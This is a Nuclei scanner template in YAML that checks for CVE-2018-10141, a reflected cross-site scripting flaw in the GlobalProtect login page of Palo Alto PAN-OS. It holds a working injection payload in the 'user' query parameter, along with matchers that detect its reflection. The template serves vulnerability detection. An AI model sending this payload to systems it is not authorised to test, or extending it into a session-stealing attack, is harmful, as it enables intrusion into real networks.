49 lines
1.8 KiB
YAML
49 lines
1.8 KiB
YAML
id: CVE-2018-10141
|
|
|
|
info:
|
|
name: Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting
|
|
author: dhiyaneshDk
|
|
severity: medium
|
|
description: Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
|
|
remediation: |
|
|
Upgrade to Palo Alto Networks PAN-OS GlobalProtect VPN client version 8.1.4 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://security.paloaltonetworks.com/CVE-2018-10141
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-10141
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2018-10141
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00126
|
|
epss-percentile: 0.46916
|
|
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: paloaltonetworks
|
|
product: pan-os
|
|
tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'var valueUser = "j";-alert(1)-"x";'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a004630440220472960bc7baecc2f34a1c09cd71028ea9a9246cc11771228277cb5077abdb96b02200a1a0a24c16dd85344120e450dd0385e72bfbd5ba12c3bcebfed275b1eb9880b:922c64590222798bb761d5b6d8e72950 |